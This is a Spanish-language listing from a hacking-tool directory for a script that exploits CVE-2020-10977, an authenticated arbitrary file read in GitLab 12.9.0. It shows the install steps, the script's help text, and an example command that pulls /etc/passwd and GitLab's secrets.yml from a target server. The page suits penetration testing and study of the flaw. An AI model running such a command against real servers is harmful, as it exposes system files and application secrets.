Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
gitlab-12.9.0-file-read — Un script (que pretende ser) mejor que los que se pueden encontrar en exploit-db sobre la lectura arbitraria de archivos autenticada en GitLab v12.9.0 (CVE-2020-10977) | Kitploit
Herramientas/GitHubGitHub/erk3/gitlab-12.9.0-file-read
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHuberk3/gitlab-12.9.0-file-read

gitlab-12.9.0-file-read

Un script (que pretende ser) mejor que los que se pueden encontrar en exploit-db sobre la lectura arbitraria de archivos autenticada en GitLab v12.9.0 (CVE-2020-10977)

Ver Repositorio
1hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

La advertencia

Solo con fines de demostración y hacking ético.

El qué

Un script (que pretende ser) mejor que los que se pueden encontrar en exploit-db sobre la lectura arbitraria autenticada de archivos en GitLab v12.9.0 (CVE-2020-10977)

El cómo

  1. Instala la dependencia (probablemente ya tengas el resto)

pip3 install requests python-gitlab

  1. Obtén un token de API usando tus credenciales

https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html

  1. ¿Profit?
root@kitploit:~
$ python3 gitlab-12.9.0-lfi.py -h
usage: gitlab-12.9.0-lfi.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  The https URI to gitlab webroot
  -u USER, --user USER  The user name
  -p PASSWD, --passwd PASSWD
                        The user password
  -t TOKEN, --token TOKEN
                        The access token
  -f FILES, --files FILES
                        The absolute paths to the files on the Gitlab local system
root@kitploit:~
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
Descargar herramienta